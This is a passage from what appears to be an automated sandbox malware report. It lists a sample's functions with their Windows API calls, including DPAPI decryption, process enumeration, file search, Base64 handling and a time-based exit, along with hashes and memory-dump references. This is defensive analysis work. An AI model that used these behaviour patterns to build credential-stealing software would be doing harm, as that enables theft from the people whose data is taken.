                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: 1b6cb693dc352b744b213f8bf930a02a2f7726fe9f292d0e6eac7d4fa0070836
                                    • Instruction ID: 24da108a4d43760a785cda8a51000f5e5b53a55091a1ce3aa8987c15ec285cca
                                    • Opcode Fuzzy Hash: 1b6cb693dc352b744b213f8bf930a02a2f7726fe9f292d0e6eac7d4fa0070836
                                    • Instruction Fuzzy Hash: FB12EC72A141189BCF18FB60DDAAEED7379AF54300F4045E9B50A66091EE306F48EFD6
                                    Function 010E31F2 Relevance: 9.1, Strings: 6, Instructions: 1639COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Aao~$`xo$qa_c$~P~?$69_$Xg
                                    • API String ID: 0-3889916959
                                    • Opcode ID: 35b28ac01d9e237c1bd6289792c2f5d2b815dcff67876018c2109d24d220d6f1
                                    • Instruction ID: 548aacf4c1baee426905b4ece78219b8d0cee137193d3b4205a032ca467ed953
                                    • Opcode Fuzzy Hash: 35b28ac01d9e237c1bd6289792c2f5d2b815dcff67876018c2109d24d220d6f1
                                    • Instruction Fuzzy Hash: 0CB229F3A0C2049FE3046E2DEC8577ABBE5EF94320F1A4A3DE6C4C7744EA7558058696
                                    Function 010E4DB4 Relevance: 9.0, Strings: 6, Instructions: 1535COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: '8y$Q1o<$Rv^|$aN.o${g6^$D=?
                                    • API String ID: 0-2212110673
                                    • Opcode ID: 3eb895af45a6249093038e3da6eb1f9050dd4b6b369f3656964beedd99b4698b
                                    • Instruction ID: 5e4538c40aa94ab89af68e709ece501eab236518e95477dff12ac7816ce296d6
                                    • Opcode Fuzzy Hash: 3eb895af45a6249093038e3da6eb1f9050dd4b6b369f3656964beedd99b4698b
                                    • Instruction Fuzzy Hash: 97A2D5F360C204AFE3046E2DEC8567ABBE9EF94720F16493DEAC4C7344E67598148796
                                    Function 00CEF8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: \u$\u${${$}$}
                                    • API String ID: 0-582841131
                                    • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction ID: 56635c3f65bdac1805bdff6e16360ab30376d3e450149e71a5fb7a2fb97bccd3
                                    • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction Fuzzy Hash: 31416B12E19BC9C5CB058B7544A12AEBFB22FD6210F6D42AEC4DD1F382C774464AD3A5
                                    Function 00C8C920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C8C971
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C8C97C
                                    • lstrcat.KERNEL32(?,00CA0B47), ref: 00C8CA43
                                    • lstrcat.KERNEL32(?,00CA0B4B), ref: 00C8CA57
                                    • lstrcat.KERNEL32(?,00CA0B4E), ref: 00C8CA78
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: cd924e3af750923514768874bdd2de30fc58d60baea114fb7d1953adf4cd6e23
                                    • Instruction ID: bd2c016b5e601d25806428348aa478043ffbb243bf6126678f8153f9b386d48b
                                    • Opcode Fuzzy Hash: cd924e3af750923514768874bdd2de30fc58d60baea114fb7d1953adf4cd6e23
                                    • Instruction Fuzzy Hash: A241507590431EDBDB10DFA0ED89BFEB7B8AB44309F1041A8F609A7280D7745A84DFA5
                                    Function 00C96BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 00C96C0C
                                    • sscanf.NTDLL ref: 00C96C39
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C96C52
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C96C60
                                    • ExitProcess.KERNEL32 ref: 00C96C7A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: abf33e50de34d412ab2d8d32aad83b44c3a1ee75e5ad368e87221b074b30b005
                                    • Instruction ID: 50554bbe1b6e7a5c62cb61e74931d87fdeb99fc8879ff5740aed1095f0049b32
                                    • Opcode Fuzzy Hash: abf33e50de34d412ab2d8d32aad83b44c3a1ee75e5ad368e87221b074b30b005
                                    • Instruction Fuzzy Hash: D521CB75D1420CABCF04EFE4E8499EEB7B9BF48301F04856AF516E3250EB349608DB69
                                    Function 00C872A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00C872AD
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C872B4
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C872E1
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00C87304
                                    • LocalFree.KERNEL32(?), ref: 00C8730E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: 194eb9d2b0556a0cd4dedfed098f8697e07676cce5b3f42f75d6146c85154382
                                    • Instruction ID: 7b8f2bbcc220ab3ab1600e4744471601143147432bf0411f7d200023f6802618
                                    • Opcode Fuzzy Hash: 194eb9d2b0556a0cd4dedfed098f8697e07676cce5b3f42f75d6146c85154382
                                    • Instruction Fuzzy Hash: 53011EB5A44308BBDB10EFE4DC46F9E7778AB44B05F204544FB05AB2C0DAB0AA009B65
                                    Function 00C99790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C997AE
                                    • Process32First.KERNEL32(00CA0ACE,00000128), ref: 00C997C2
                                    • Process32Next.KERNEL32(00CA0ACE,00000128), ref: 00C997D7
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 00C997EC
                                    • CloseHandle.KERNEL32(00CA0ACE), ref: 00C9980A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 4534ada02ca61408c4586b90e798ad27e9aec8a4a21aef0655158306e10537ac
                                    • Instruction ID: 0ffc7522c23f8a274c852790d300d4ae8f0f6359cc75e8d29a84a76e1c1b5d9b
                                    • Opcode Fuzzy Hash: 4534ada02ca61408c4586b90e798ad27e9aec8a4a21aef0655158306e10537ac
                                    • Instruction Fuzzy Hash: 3201E975A14308EBDF20DFA5DD48BEDB7B8EB08701F10458CE50996280EB709B40DF50
                                    Function 00CA4573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <7\h$huzx
                                    • API String ID: 0-2989614873
                                    • Opcode ID: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                                    • Instruction ID: fca3dca083d09b05dbaf72822bf328ba4bb1215a08fc7537399e5e58001186ac
                                    • Opcode Fuzzy Hash: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                                    • Instruction Fuzzy Hash: 4963863241EBD61ECB27CF3047B62917F66BA1321831D8ACEC4D18F5B3C6949A16E356
                                    Function 00C99030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,00C851D4,40000001,00000000,00000000,?,00C851D4), ref: 00C99050
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: f677e76f8046673077448717ff90f9fa6b0994b704d74d91751c9034bd775912
                                    • Instruction ID: b104069a1b9c71d2e19c1d133f62f190be7dcd5434b6743806080e53f4702d7c
                                    • Opcode Fuzzy Hash: f677e76f8046673077448717ff90f9fa6b0994b704d74d91751c9034bd775912
                                    • Instruction Fuzzy Hash: FC110A70204308FFDF00DF59D889FAB33A9EF8A311F109448FA298B250D772E9419B60
                                    Function 00C8A210 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C84F3E,00000000,00000000), ref: 00C8A23F
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00C84F3E,00000000,?), ref: 00C8A251
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C84F3E,00000000,00000000), ref: 00C8A27A
                                    • LocalFree.KERNEL32(?,?,?,?,00C84F3E,00000000,?), ref: 00C8A28F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: 083cfbe814bd77ea99b38e9f3f11b2613586d7d73478f0954fed3d4399f1f522
                                    • Instruction ID: 13428e13720311803a8e3b4d16c59be79141a1b6d1a4a7bd3072c57374ef13ae
                                    • Opcode Fuzzy Hash: 083cfbe814bd77ea99b38e9f3f11b2613586d7d73478f0954fed3d4399f1f522
                                    • Instruction Fuzzy Hash: 4711D474240308AFEB10DF64DC95FAA77B5EB88B15F208089FE199B390C772AA41CB54
                                    Function 00C97BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0152DB48,00000000,?,00CA0DF8,00000000,?,00000000,00000000), ref: 00C97BF3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C97BFA
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0152DB48,00000000,?,00CA0DF8,00000000,?,00000000,00000000,?), ref: 00C97C0D
                                    • wsprintfA.USER32 ref: 00C97C47
                                    Memory Dump Source
